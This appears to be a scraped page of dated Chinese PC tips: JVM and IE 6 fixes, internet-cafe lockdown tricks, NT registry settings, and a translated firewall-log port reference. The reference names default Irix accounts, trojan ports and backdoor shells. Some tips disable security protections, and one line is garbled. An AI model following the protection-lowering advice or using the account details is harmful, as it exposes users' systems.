      在操作系统中，JAVA程序的执行必须通过JVM来完成，但JVM并不是作为 WINDOWSXP 的默认项目进行安装的，因此，你的电脑可能没有预装JVM而导致了JAVA出错的问题。

      如果是JVM缺失，当你第一次访问有JAVA程序的网站时，会自动弹出一个对话框，叫你下载JVM。当然，这时你下载的是微软自己的JVM，而不是 SUN 公司的JAVA，因此，建议你不要进行下载，另外还是去下载 SUN 公司的JVM吧。这是因为微软自身的JVM比较"历史悠远"，不能认识一些新型的JAVA程序。
      但另外一方面， SUN 公司的JVM也不尽人意，而且它还处于测试阶段，尚有不少问题。这也是我们说JAVA左右为难的原因。

      如果你确实想在 WINDOWS XP 上运行JAVA程序，我们建议你还是下载 SUN 公司的JVM。

      2．JAVA 版本号不符合：
      从上面我们可以看到，由于没有统一的JAVA标准，用它编写出来的程序往往会出现版本限制的问题。如果版本号不合，JAVA 程序的执行也会被中止。解决办法是：如果作者有提示，按其提示下载相关版本的JAVA。

      3．安全级别中是否已经开启JAVA功能：
      打开 IE ，"工具/INTERNET 选项/安全"，在这里查看是否已经激活JAVA。高级别的安全方案会自动屏蔽JAVA功能，这时你就需要降低安全级别并启用JAVA功能。

      4．显卡的设置：
      不是最优配置的显卡驱动，在 WINDOWS XP 环境下也常常是导致JAVA出错的原因。如果前面几种方法都不能解决JAVA运行的问题，可以试试显卡设置的方法。

      在桌面上任意空白处点击鼠标右键，"属性/设置"，弹出如图三的面板：

      试着将颜色模式调低，如256色；分辩率也调低点，如800X600的解析度就行了，然后系统重启，再运行该JAVA程序。

      如果此时能运行JAVA了，那么说明你的显卡驱动有问题，去升级吧。

      5．重装JVM：
      如果以上的办法都不管用，那么就只能重装JVM了。但请注意，重装JVM跟装其他软件不一样，如果你的电脑曾装有某个版本的JVM，那么首先你得将其完全卸载(包括相关的注册表信息)，然后再安装新的JVM，否则会报错甚至让整个操作系统瘫痪！

      另外，在彻底删除JAVA前，最好将 C:\WINDOWS\JAVA目录中的文件做个备份。

      三、IE 6.0无法浏览采用安全机制的网站

      A．现象：
      安装IE 6.0之前，浏览器可以正常浏览采用安全机制的网站，如在线购物网站；浏览器升级后无法浏览，浏览器或者返回无法打开的网页文件，或者报告加密机制出错。

      B．解决办法：
      安装IE 6.0时，常常会破坏原有的动态链接库(DYNAMIC LINK LIBRARIES)，浏览器不能浏览加密网站，极有可能是因为支持 128 位加密功能的动态链接文件受损，这时就必须对相关的动态链接加以修复。

      首先下载加密数据包(下载地址)，然后运行。由于已经安装了IE 6.0，数据包运行时会报告已经安装了128位加密协议，不需要再下载了。不管它，继续运行，完成后就修复了。

      当然，还有另外一种可能，就是不小心屏蔽了IE的SSL加密协议。打开IE 6.0，"工具/INTERNET 选项/高级/安全"，然后找到"使用SSL 2.0"、"使用SSL 3.0"选项，看前面的复选框是否勾选。

      SSL是网络数据加密协议，必须在启用它后才能浏览具有安全机制的网站。

      四、IE 6.0，黑客的恶意相邀
      漏洞并非 IE 或者微软的产品所独有，可以说世界上不存在没有漏洞的应用程序。作为全球性的浏览器，IE不断成为黑客进攻的突破点也是情有可原的。当然，你可以用诸如 NETSCAPE、OPERA这些浏览器。但对于更多的用户，IE仍是他们的首要选择。

      对于坚持使用IE的用户，建议每个星期用 "WINDOWS UPDATE"登陆微软的官方升级网站，查看是否有新的漏洞被发现，是否有新的补丁下载。


并不疯狂的禁止

《一键清理系统垃圾》

并不疯狂的禁止

用了还原精灵当然并不安全,最头痛的就是cy07之类的在线破解,万一还原精灵失效,监控计费被终止,中硬盘炸弹等，你再怎么还原也晚了。只好拿出点东东跟大家分享
先下载个eXeScope用来修改dll文件，这东东网盟早有介绍，不多说了，以下例子是win98的
1、c:\windows\system\Cryptui.dll是证书，只要修改4107项，除了“取消”其它都“不可见”和“禁用”就解除cy07的在线破解了，而对碧聊、flash插件等证书没影响
2、c:\windows\system\Shdoclc.dll的4416项，把"确定"给禁用了，当然这些还不够，右键的“目标另存为”也要禁止了才行，把这个导入注册表吧：： [ 点击下载 ]这样顺便把下载也给禁止多一次了，网页另存为也禁了
高手太多，漏网之鱼能防多少算多少，我用的是美萍，exe、rar、zip、cab全不让下载了，再加上“文件下载”、“%完成”等窗口一打开就关闭
本想还在ie设置的安全里再禁一次下载的，哎~算了，懒~

ps:其实修改dll的灵感来自deone，他暂不公开dll原文件有其道理（我也是在1千多个dll文件里慢慢找出这么丁点来的）作为网吧管理也理解同行们的工作实在是太艰巨，安全与维护实太有太多的矛盾，禁与不禁只能按自己的网吧环境而行之

比如“共享”、“打开”，我禁止了访问C盘，而且用还原精灵，就只把C:和C:下的几个关键目录文件全隐藏，把“文件夹选项”在美萍下给禁止显示就行了，后门不太大的东东，改了dll自己维护不方便，只要不破我的还原精灵，重启后就没事了。但也要再次强烈建议网吧管理们一定要对“禁止窗口标题”功能多加利用，如果你们的管理程序没这功能，只有推荐你们使用PCSecurity。

求助：
1、“另存为”，这个小窗口其实最是棘手，里边对网吧的威胁比“打开”要大得多，但又不能绝对禁止，想修改但花了一晚都找不到其代码在哪个文件
回：最好不要修改,我原来修改过了又改回来了,象联众的四国大战要存盘,如果改了就没法存盘了
To2楼：另存为我以前也禁止过，但联众、中游的存盘也不行了，只好重新开放。

但你发现没有？联众和中游戏的存盘，默认保存和打开的位置，都是在该程序的本文件夹里的，我们要修改的只是不让“另存为”转换盘符和路径。

这样就能让QQ、UC之类防不胜防的文件传输保存在我们指定的位置上了，再进一步尽可能的杜绝网吧的这个绝对漏洞。
2、还有网吧机器最大的漏洞在于开机按f8、f5、ctrl、shift之类的，不敢禁用自己的后门，只能修改开机热键，要怎么做才好呢？还望高手们不吝赐教
回：可以在进入DOS加入密码的.


不可不会的NT注册表修改技巧

《一键清理系统垃圾》

不可不会的NT注册表修改技巧

    在Windows 95/98中修改注册表文件是regedit.exe来进行编辑的，而在Windows NT中修改Registry数据库是使用两个版本的“注册表编辑器”：Regedt32.exe和regedit.exe来编辑注册表的，本文是使用Regedt32实用程序来对注册表进行编辑的。Regedt32可以在%system root%\system32目录下找到，Regedit程序则可以在%system%目录中找到。首先我们必须明确的是，当你对注册表进行改动时，注册表编辑器不使用任何语法或可靠的检测方法，也就是说编辑注册表是一种危险的操作。一旦对Registry做了不正确的改动后，可能造成系统不稳定或无法引导操作系统。本人建议在编辑注册表前对注册表进行备份，应急盘工具允许用户备份注册表和修复任何可能发生的注册表问题。运行Rdisk.exe，它将生成一个文件，用户可以将该文件存贮在硬盘，软盘或网络中的某个位置。在此之后，你还必须制作一个紧急修复盘（EBD）保存注册表系统部分信息，它可以使用户重新引导系统并使用注册表的备份。下面笔者将自己在使用NT时觉得十分有必要和实用的设置给朋友们说明一下，希望能给大家一些启示：

    （一）设置启动信息

    每次当Windows NT启动时，它都会显示“请按Ctrl＋Alt＋Delete键来登录”的信息，而你希望用户在按完Ctrl＋Alt＋Delete键后，画面上自动显示一些你希望用户看到的信息，则可以利用以下方法：

    （1）在“开始”、“运行”提示符输入Regedt32，打开Regedt32窗口（注册表编辑器）。

    （2）选择以下键值HKEY_LOCAL_MACHINE\-SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon。

    （3）双击窗格右方的“LegalNoticeCaption”数值名称，当出现“字符串编辑器”对话框时，请在“字符串”文本框中输入信息对话窗口的标题，例如“警告”。双击右方的“LegalNoticeText”数值名称，当出现“字符串编辑器”对话框时，请在“字符串”文本框中输入信息窗口的内容，如：“请你不要试图登录NT服务器”。

    （4）注销（Logoff）后，重新登录（Logon），就可看到所设置的启动信息。

    （二）更改登录时的背景图案

    你可以选择登录时的背景图案，也就是设置当启动屏幕上出现“开始登录”对话框，并要求按“Ctrl＋Alt＋Delete”键以登录Windows NT网络时的背景图案，方法如下：

    （1）在“开始”、“运行”提示符输入Regedt32，打开Regedt32窗口（注册表编辑器）。

    （2）选择以下键值HKEY_USERS\DEFAULT-\ControlPanel\Desktop

    （3）单击窗口右方的“Wallpaper”数值名称，当出现的“字符串编辑器”对话框时，请在“字符串”文本框中输入背景图案的图形文件名称，如C:\Winnt\Swimming Pool.bmp。

    （4）双击窗口右方的“Tile Wallpaper”数值名称，当出现“字符串编辑器”对话框时，请在“字符串”文本框中输入1（或其它非0的数值）。

    （5）注销后重新登录，你就会发现登录时的背景图案已改变。

    （三）不登录而直接关闭系统的方法

    当启动屏幕上出现“开始登录”的对话框时，你必须同时按“Ctrl＋Alt＋Delete”键，然后输入名称与密码，以便登录Windows NT Server。如果你此时并不想登录而直接关闭系统（ShutDown），其实大多数情况下是这样的（因为平时服务器只要启动起来就可以了），就是在其登录对话框中增加一个“关闭系统”的按钮选项（注：在Windows NT Workstation 4.0是自动出现此“关闭系统”的按钮，但是在Windows NT Sever 4.0中则必须自己添加）。方法如下所示：

    （1）在“开始”/“运行”提示符输入Regedt32，打开Regedt32窗口（注册表编辑器）。

    （2）选择以下的键值HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Current-Version\Winlogon

    （3）双击右方的“Shutdown WithoutLogon”数值名称，当出现“字符串编辑器”对话框时，请在“字符串”文本框中输1。

    （4）注销后重新登录，在登录的画面上会多出一个“关闭系统”的按钮。

    （5）这时候只要你用鼠标单击“关闭系统”按钮，系统就会直接关闭。

    （四）不显示前一个登录者的帐号名称

    当你要登录NTS，按下“Ctrl＋Alt＋Delete”键后，系统要求你输入用户名称和密码，Windows NT缺省会自动将前一个登录者的名称显示在“用户名”框中，有时候你不希望显示此名称，则可以采用以下方法：

    （1）选择“开始”、“运行”对话框中输入“Reg-edt32.exe”，启动注册表编辑器。

    （2）择以下键值HKEY_LOCAL_MACHINE\-SOFTWARE\Microsoft\Windows NT\Curre－ntVersion\Winlogon

    （3）双击“DontDisplayLastUserName”数值名称（如果没有此名称，则利用“编辑”菜单的“添加”数值命令进行添加，其数据类型为REG_SZ）。当出现“字符串编辑器”对话框时，在“字符串”文本框中输入1。

    （4）注销以后重新登录测试一下你刚才的设置。

    好了，都讲了这么多了。还不快快去试一试，让你的NT Server为你更方便的服务吧？


编辑注册表

《一键清理系统垃圾》

编辑注册表

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\NOHIDDEN
删除键值 TYRE=RADIO

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\SHOWALL
删除键值 TYRE=RADIO

切记..在删除注册表键值之前必须先备份该注册表,否则..嘿嘿~~~


端口可分为3大类：

《一键清理系统垃圾》

端口可分为3大类：

1） 公认端口（Well Known Ports）：从0到1023，它们紧密绑定于一些服务。通常这
些端口的通讯明确表
明了某种服务的协议。例如：80端口实际上总是HTTP通讯。
2） 注册端口（Registered Ports）：从1024到49151。它们松散地绑定于一些服务。
也就是说有许多服务
绑定于这些端口，这些端口同样用于许多其它目的。例如：许多系统处理动态端口从
1024左右开始。
3） 动态和/或私有端口（Dynamic and/or Private Ports）：从49152到65535。理论
上，不应为服务分配
这些端口。实际上，机器通常从1024起分配动态端口。但也有例外：SUN的RPC端口从
32768开始。
本节讲述通常TCP/UDP端口扫描在防火墙记录中的信息。记住：并不存在所谓ICMP端
口。如果你对解读ICMP数据感兴趣，请参看本文的其它部分。
0 通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口，
当你试图使用一种通常的闭合端口连接它时将产生不同的结果。一种典型的扫描：使用
IP地址为0.0.0.0，设置ACK位并在以太网层广播。
1 tcpmux 这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者，缺省情
况下tcpmux在这种系统中被打开。Iris机器在发布时含有几个缺省的无密码的帐户，如
lp, guest, uucp, nuucp, demos, tutor, diag, EZsetup, OutOfBox, 和4Dgifts。许
多管理员安装后忘记删除这些帐户。因此Hacker们在 Internet上搜索tcpmux并利用这
些帐户。
7 Echo 你能看到许多人们搜索Fraggle放大器时，发送到x.x.x.0和x.x.x.255的信息。
常见的一种DoS攻击是echo循环（echo-loop），攻击者伪造从一个机器发送到另一个机
器的UDP数据 包，而两个机器分别以它们最快的方式回应这些数据包。（参见Chargen
） 另一种东西是由DoubleClick在词端口建立的TCP连接。有一种产品叫做“Resonate
Global Dispatch”，它与DNS的这一端口连接以确定最近的路由。 Harvest/squid
cache将从3130端口发送UDP echo：“如果将cache的source_ping on选项打开，它将对
原始主机的UDP echo端口回应一个HIT reply。”这将会产生许多这类数据包。
11 sysstat 这是一种UNIX服务，它会列出机器上所有正在运行的进程以及是什么启动
了这些进程。这为入侵者提供了许多信息而威胁机器的安全，如暴露已知某些弱点或帐
户的程序。这与UNIX系统中“ps”命 令的结果相似.
再说一遍：ICMP没有端口，ICMP port 11通常是ICMP type=11
19 chargen 这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾
字符的包。TCP连接时，会发送含有垃圾字符的数据流知道连接关闭。Hacker利用IP欺
骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。由于服务器企图回应两个
服务器之间的无限的往返数据通讯一个chargen和echo将导致服务器过载。同样
fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包，受害者
为了回应这些数据而过载。
21 ftp 最常见的攻击者用于寻找打开“anonymous”的ftp服务器的方法。这些服务器
带有可读写的目录。Hackers或Crackers 利用这些服务器作为传送warez (私有程序)
和pr0n(故意拼错词而避免被搜索引擎分类)的节点。
22 ssh PcAnywhere建立TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱
点。如果配置成特定的模式，许多使用RSAREF库的版本有不少漏洞。（建议在其它端口
运行ssh）还应该注意的是ssh工具包带有一个称为make-ssh-known-hosts的程序。它会
扫描整个域的ssh主机。你有时会被使用这一程序的人无意中扫描到。
UDP（而不是TCP）与另一端的5632端口相连意味着存在搜索pcAnywhere的扫描。5632（
十六进制的0x1600）位交换后是0x0016（使进制的22）。
23 Telnet 入侵者在搜索远程登陆UNIX的服务。大多数情况下入侵者扫描这一端口是为
了找到机器运行的操作系统。此外使用其它技术，入侵者会找到密码。
技术文摘Page 2 of 5
mk:@MSITStore:F:\tools\htools\book\book.chm::/MYWEB/hei.../safetv07.ht
2002-5-14
25 smtp 攻击者（spammer）寻找SMTP服务器是为了传递他们的spam。入侵者的帐户总
被关闭，他们需要拨号连接到高带宽的e-mail服务器上，将简单的信息传递到不同的地
址。SMTP服务器（尤其是sendmail）是进入系统的最常用方法之一，因为它们必须完整
的暴露于Internet且邮件的路由是复杂的（暴露+复杂=弱点）。
53 DNS Hacker或crackers可能是试图进行区域传递（TCP），欺骗DNS（UDP）或隐藏其
它通讯。因此防火墙常常过滤或记录53端口。
需要注意的是你常会看到53端口做为UDP源端口。不稳定的防火墙通常允许这种通讯并
假设这是对DNS查询的回复。Hacker常使用这种方法穿透防火墙。
67和68 Bootp和DHCP UDP上的Bootp/DHCP：通过DSL和cable-modem的防火墙常会看见大
量发送到广播地 址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址分
配。Hacker常进入它们分配一个地址 把自己作为局部路由器而发起大量的“中间人”
（man-in-middle）攻击。客户端向68端口（bootps）广播 请求配置，服务器向67端口
（bootpc）广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的 IP地
址。
69 TFTP(UDP) 许多服务器与bootp一起提供这项服务，便于从系统下载启动代码。但是
它们常常错误配置而从系统提供任何文件，如密码文件。它们也可用于向系统写入文
件。
79 finger Hacker用于获得用户信息，查询操作系统，探测已知的缓冲区溢出错误，回
应从自己机器到其它机器finger扫描。
98 linuxconf 这个程序提供linux boxen的简单管理。通过整合的HTTP服务器在98端口
提供基于Web界面的服务。它已发现有许多安全问题。一些版本setuid root，信任局域
网，在/tmp下建立Internet可访问的文件，LANG环境变量有缓冲区溢出。此外因为它包
含整合的服务器，许多典型的HTTP漏洞可能存在（缓冲区溢出，历遍目录等）
109 POP2 并不象POP3那样有名，但许多服务器同时提供两种服务（向后兼容）。在同
一个服务器上POP3的漏洞在POP2中同样存在。
110 POP3 用于客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用
户名和密码交换缓冲区溢出的弱点至少有20个（这意味着Hacker可以在真正登陆前进入
系统）。成功登陆后还有其它缓冲区溢出错误。
111 sunrpc portmap rpcbind Sun RPC PortMapper/RPCBIND。访问portmapper是扫描
系统查看允许哪些RPC服务的最早的一步。常见RPC服务有：rpc.mountd, NFS,
rpc.statd,rpc.csmd, rpc.ttybd, amd等。入侵者发现了允许的RPC服务将转向提供服
务的特定端口测试漏洞。记住一定要记录线路中的daemon, IDS, 或sniffer，你可以发
现入侵者正使用什么程序访问以便发现到底发生了什么。
113 Ident auth 这是一个许多机器上运行的协议，用于鉴别TCP连接的用户。使用标准
的这种服务可以
获得许多机器的信息（会被Hacker利用）。但是它可作为许多服务的记录器，尤其是
FTP, POP, IMAP, SMTP
和IRC等服务。通常如果有许多客户通过防火墙访问这些服务，你将会看到许多这个端
口的连接请求。记
住，如果你阻断这个端口客户端会感觉到在防火墙另一边与e-mail服务器的缓慢连接。
许多防火墙支持在
TCP连接的阻断过程中发回RST，着将回停止这一缓慢的连接。
119 NNTP news 新闻组传输协议，承载USENET通讯。当你链接到诸如：
news://comp.security.firewalls/. 的地址时通常使用这个端口。这个端口的连接企
图通常是人们在寻找
USENET服务器。多数ISP限制只有他们的客户才能访问他们的新闻组服务器。打开新闻
组服务器将允许发/读
任何人的帖子，访问被限制的新闻组服务器，匿名发帖或发送spam。
135 oc-serv MS RPC end-point mapper Microsoft在这个端口运行DCE RPC
end-point mapper为它的
DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和/或RPC的服务利用机器上的
end-point mapper注册
它们的位置。远端客户连接到机器时，它们查询end-point mapper找到服务的位置。同
样Hacker扫描机器的
这个端口是为了找到诸如：这个机器上运行Exchange Server吗？是什么版本？
这个端口除了被用来查询服务（如使用epdump）还可以被用于直接攻击。有一些DoS攻
击直接针对这个
端口。
技术文摘Page 3 of 5
mk:@MSITStore:F:\tools\htools\book\book.chm::/MYWEB/hei.../safetv07.ht
2002-5-14
137 NetBIOS name service nbtstat (UDP) 这是防火墙管理员最常见的信息，请仔细
阅读文章后面的
NetBIOS一节
139 NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB
服务。这个协
议被用于Windows“文件和打印机共享”和SAMBA。在Internet上共享自己的硬盘是可能
是最常见的问题。
大量针对这一端口始于1999，后来逐渐变少。2000年又有回升。一些VBS（IE5
VisualBasic
Scripting）开始将它们自己拷贝到这个端口，试图在这个端口繁殖。
143 IMAP 和上面POP3的安全问题一样，许多IMAP服务器有缓冲区溢出漏洞运行登陆过
程中进入。记
住：一种Linux蠕虫（admw0rm）会通过这个端口繁殖，因此许多这个端口的扫描来自不
知情的已被感染的用
户。当RadHat在他们的Linux发布版本中默认允许IMAP后，这些漏洞变得流行起来。
Morris蠕虫以后这还是
第一次广泛传播的蠕虫。
这一端口还被用于IMAP2，但并不流行。
已有一些报道发现有些0到143端口的攻击源于脚本。
161 SNMP(UDP) 入侵者常探测的端口。SNMP允许远程管理设备。所有配置和运行信息都
储存在数据库
中，通过SNMP客获得这些信息。许多管理员错误配置将它们暴露于Internet。Crackers
将试图使用缺省的密
码“public”“private”访问系统。他们可能会试验所有可能的组合。
SNMP包可能会被错误的指向你的网络。Windows机器常会因为错误配置将HP JetDirect
remote
management软件使用SNMP。HP OBJECT IDENTIFIER将收到SNMP包。新版的Win98使用
SNMP解析域名，你会看
见这种包在子网内广播（cable modem, DSL）查询sysName和其它信息。
162 SNMP trap 可能是由于错误配置
177 xdmcp 许多Hacker通过它访问X-Windows控制台，它同时需要打开6000端口。
513 rwho 可能是从使用cable modem或DSL登陆到的子网中的UNIX机器发出的广播。这
些人为Hacker进
入他们的系统提供了很有趣的信息。
553 CORBA IIOP (UDP) 如果你使用cable modem或DSL VLAN，你将会看到这个端口的广
播。CORBA是一
种面向对象的RPC（remote procedure call）系统。Hacker会利用这些信息进入系统。

600 Pcserver backdoor 请查看1524端口
一些玩script的孩子认为他们通过修改ingreslock和pcserver文件已经完全攻破了系统
-- Alan J.
Rosenthal.
635 mountd Linux的mountd Bug。这是人们扫描的一个流行的Bug。大多数对这个端口
的扫描是基于UDP
的，但基于TCP的mountd有所增加（mountd同时运行于两个端口）。记住，mountd可运
行于任何端口（到底
在哪个端口，需要在端口111做portmap查询），只是Linux默认为635端口，就象NFS通
常运行于2049端口。
1024 许多人问这个端口是干什么的。它是动态端口的开始。许多程序并不在乎用哪个
端口连接网络，
它们请求操作系统为它们分配“下一个闲置端口”。基于这一点分配从端口1024开始。
这意味着第一个向系
统请求分配动态端口的程序将被分配端口1024。为了验证这一点，你可以重启机器，打
开Telnet，再打开一
个窗口运行“natstat -a”，你将会看到Telnet被分配1024端口。请求的程序越多，动
态端口也越多。操作
系统分配的端口将逐渐变大。再来一遍，当你浏览Web页时用“netstat”查看，每个
Web页需要一个新端
口。
?ersion 0.4.1, June 20, 2000
http://www.robertgraham.com/pubs/firewall-seen.html
Copyright 1998-2000 by Robert Graham
(firewall-seen1@robertgraham.com.
All rights reserved. This document．nbspmay only be reproduced (whole or
in part) for non-commercial purposes. All reproductions must
contain this copyright notice and must not be altered, except by
permission of the author.
1025 参见1024
1026 参见1024
1080 SOCKS
技术文摘Page 4 of 5
mk:@MSITStore:F:\tools\htools\book\book.chm::/MYWEB/hei.../safetv07.ht
2002-5-14
这一协议以管道方式穿过防火墙，允许防火墙后面的许多人通过一个IP地址访问
Internet。理论上它应
该只允许内部的通信向外达到Internet。但是由于错误的配置，它会允许
Hacker/Cracker的位于防火墙外部
的攻击穿过防火墙。或者简单地回应位于Internet上的计算机，从而掩饰他们对你的直
接攻击。WinGate是
一种常见的Windows个人防火墙，常会发生上述的错误配置。在加入IRC聊天室时常会看
到这种情况。
1114 SQL
系统本身很少扫描这个端口，但常常是sscan脚本的一部分。
1243 Sub-7木马（TCP）
参见Subseven部分。
1524 ingreslock后门
许多攻击脚本将安装一个后门Sh*ll 于这个端口（尤其是那些针对Sun系统中Sendmail
和RPC服务漏洞的
脚本，如statd, ttdbserver和cmsd）。如果你刚刚安装了你的防火墙就看到在这个端
口上的连接企图，很
可能是上述原因。你可以试试Telnet到你的机器上的这个端口，看看它是否会给你一个
Sh*ll 。连接到
600/pcserver也存在这个问题。
2049 NFS
NFS程序常运行于这个端口。通常需要访问portmapper查询这个服务运行于哪个端口，
但是大部分情况
是安装后NFS 杏谡飧龆丝冢?acker/Cracker因而可以闭开portmapper直接测试这个端
口。
3128 squid
这是Squid HTTP代理服务器的默认端口。攻击者扫描这个端口是为了搜寻一个代理服务
器而匿名访问
Internet。你也会看到搜索其它代理服务器的端口：8000/8001/8080/8888。扫描这一
端口的另一原因是：
用户正在进入聊天室。其它用户（或服务器本身）也会检验这个端口以确定用户的机器
是否支持代理。请查
看5.3节。
5632 pcAnywere
你会看到很多这个端口的扫描，这依赖于你所在的位置。当用户打开pcAnywere时，它
会自动扫描局域
网C类网以寻找可能得代理（译者：指agent而不是proxy）。Hacker/cracker也会寻找
开放这种服务的机
器，所以应该查看这种扫描的源地址。一些搜寻pcAnywere的扫描常包含端口22的UDP数
据包。参见拨号扫
描。
6776 Sub-7 artifact
这个端口是从Sub-7主端口分离出来的用于传送数据的端口。例如当控制者通过电话线
控制另一台机
器，而被控机器挂断时你将会看到这种情况。因此当另一人以此IP拨入时，他们将会看
到持续的，在这个端
口的连接企图。（译者：即看到防火墙报告这一端口的连接企图时，并不表示你已被
Sub-7控制。）
6970 RealAudio
RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP7070端口
外向控制连接设
置的。
13223 PowWow
PowWow 是Tribal Voice的聊天程序。它允许用户在此端口打开私人聊天的连接。这一
程序对于建立连
接非常具有“进攻性”。它会“驻扎”在这一TCP端口等待回应。这造成类似心跳间隔
的连接企图。如果你
是一个拨号用户，从另一个聊天者手中“继承”了IP地址这种情况就会发生：好象很多
不同的人在测试这一
端口。这一协议使用“OPNG”作为其连接企图的前四个字节。
17027 Conducent
这是一个外向连接。这是由于公司内部有人安装了带有Conducent "adbot" 的共享软
件。Conducent
"adbot"是为共享软件显示广告服务的。使用这种服务的一种流行的软件是Pkware。有
人试验：阻断这一外
向连接不会有任何问题，但是封掉IP地址本身将会导致adbots持续在每秒内试图连接多
次而导致连接过载：
机器会不断试图解析DNS名─ads.conducent.com，即IP地址216.33.210.40 ；
216.33.199.77 ；
216.33.199.80 ；216.33.199.81；216.33.210.41。（译者：不知NetAnts使用的
Radiate是否也有这种现
象）
技术文摘Page 5 of 5
mk:@MSITStore:F:\tools\htools\book\book.chm::/MYWEB/hei.../safetv07.ht
2002-5-14
27374 Sub-7木马(TCP)
参见Subseven部分。
30100 NetSphere木马(TCP)
通常这一端口的扫描是为了寻找中了NetSphere木马。
31337 Back Orifice “elite”
Hacker中31337读做“elite”/ei’li:t/（译者：法语，译为中坚力量，精华。即
3=E, 1=L, 7=T）。
因此许多后门程序运行于这一端口。其中最有名的是Back Orifice。曾经一段时间内这
是Internet上最常见
的扫描。现在它的流行越来越少，其它的木马程序越来越流行。
31789 Hack-a-tack
这一端口的UDP通讯通常是由于"Hack-a-tack"远程访问木马（RAT, Remote Access
Trojan）。这种木
马包含内置的31790端口扫描器，因此任何31789端口到317890端口的连接意味着已经有
这种入侵。（31789
端口是控制连接，317890端口是文件传输连接）
32770~32900 RPC服务
Sun Solaris的RPC服务在这一范围内。详细的说：早期版本的Solaris（2.5.1之前）将
portmapper置于
这一范围内，即使低端口被防火墙封闭仍然允许Hacker/cracker访问这一端口。扫描这
一范围内的端口不是
为了寻找portmapper，就是为了寻找可被攻击的已知的RPC服务。
33434~33600 traceroute
如果你看到这一端口范围内的UDP数据包（且只在此范围之内）则可能是由于
traceroute。参见
traceroute部分。
41508 Inoculan
早期版本的Inoculan会在子网内产生大量的UDP通讯用于识别彼此。参见
http://www.circlemud.org/~jelson/software/udpsend.html
http://www.ccd.bnl.gov/nss/tips/inoculan/index.html
(二） 下面的这些源端口意味着什么？
端口1~1024是保留端口，所以它们几乎不会是源端口。但有一些例外，例如来自NAT机
器的连接。参见
1.9。
常看见紧接着1024的端口，它们是系统分配给那些并不在乎使用哪个端口连接的应用程
序的“动态端
口”。
Server Client 服务描述
1-5/tcp 动态FTP 1-5端口意味着sscan脚本
20/tcp 动态FTP FTP服务器传送文件的端口
53 动态FTP DNS从这个端口发送UDP回应。你也可能看见源/目标端口的TCP连接。
123 动态S/NTP 简单网络时间协议（S/NTP）服务器运行的端口。它们也会发送到这个
端口的广播。
27910~27961/udp 动态Quake Quake或Quake引擎驱动的游戏在这一端口运行其服务器。
因此来自这一
端口范围的UDP包或发送至这一端口范围的UDP包通常是游戏。


电脑高手应用技巧大荟萃

《一键清理系统垃圾》

电脑高手应用技巧大荟萃

    OE不能打开邮件

    问：我一直使用OE收发邮件。朋友给我发过来一封邮件，附件有1M大小左右，但不知为什么打不开，无法浏览这封信。请问为什么？

    答：这可能是Outlook Express自带的病毒检测所造成的。选择“工具→选项→安全”，将“不允许保存或打开可能有病毒的附件”选项去除，然后就可以顺利打开附件了。

    开机出现WinMgmt.exe错误

    问：我使用的是Windows 2000，最近开机时出现“WinMgmt.exe产生了错误，将会被Windows关闭，需要重新启动程序”的错误提示，点击确定后，它还是重复出现。重新安装还是不行！

    答：这说明该文件已被损坏。重新安装还是不行，说明Windows 2000的安装光盘也有问题。WinMgmt.exe在Windows 2000中是作为一个服务来运行的。WinMgmt.exe(CIM对象管理器)和知识库(Repository)是WMI两个主要构成部分，而WMI则是Windows 2000不可缺少的一部分。你可以通过重新安装Windows 2000 Service Pack 2来修复WinMgmt.exe。Windows 2000 Service Pack 2可在Http://www.microsoft.com/china/windows2000/SP2.htm处下载到。

    为何有许多Desktop选项

    问：最近无意间发现自启动程序中有好多个Desktop项，先前以为感染了病毒，但用最新的杀毒软件查杀后并没有发现，这是怎么回事啊？如何将它们清除呢？

    答：这里启动的Desktop并不是病毒，而是桌面以及文件夹外观的信息，它们记录了你的桌面设置和文件夹外观样式的显示方式，最好不要禁止它们。

    网络蚂蚁下载失效

    问：我用网络蚂蚁，但最近居然出现点击下载链接时没有任何的反应，就好像没有点击一样。我以为是软件有问题，但删了重装还是不行，请问这是什么原因？

    答：以前也有读者询问过类似的问题，问题可能出在你并没有开启软件的监视功能所致。在工具栏中有个“监视”选项，将“所使用的浏览器”打勾，然后将“监视的文件类型”尽量添加全一些。另外，据我所知，如果下载软件的安装目录有中文的话也会使监视功能失效。

    开机速度为何很慢

    问：我安装的是Windows XP，在启动进入那个滚动条时速度很慢，大约要等2～3分钟，请问如何才能提高一点速度？

    答：如果你是第一次安装Windows XP系统的话，原因是你的电脑配置太低所造成的，没有办法可以提速的。如果使用过一段时间后出现这种情况，那可能是你的开机自启动项目太多，影响了速度，你可以在注册表的HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentbersionRun里面，把不需要的启动项目删除。还有一个可能就是你的系统磁盘分区空间不足，你可以禁用系统还原试试看。

    设置虚拟内存

    问：我使用的是Windows XP，最近启动到“欢迎使用”界面时，机箱发出“嘟”的一声，并提示“有限的虚拟内存”错误，要求我到控制面板中设置页面文件。我按照提示去设置了，并把页面文件大小按照推荐值调整好后重启，但发现问题依旧。进入“虚拟内存”选项，发现我自定义的页面文件大小已生效，但“当前分配值”一处仍为“0”，重新设置重启多次均无效。这是为何？

    答：“当前分配值”仍然为“0”就说明你设置的并没有生效。虚拟内存的设置与其他设置的方法有所不同，如果你输入完“初始大小”和“最大值”后就点击了“确定”的话是不能让设置生效的。正确的方法是输入数值后点击一下旁边的“设置”按钮，然后再点击“确定”才可以使设置生效。

    电影字幕无法显示

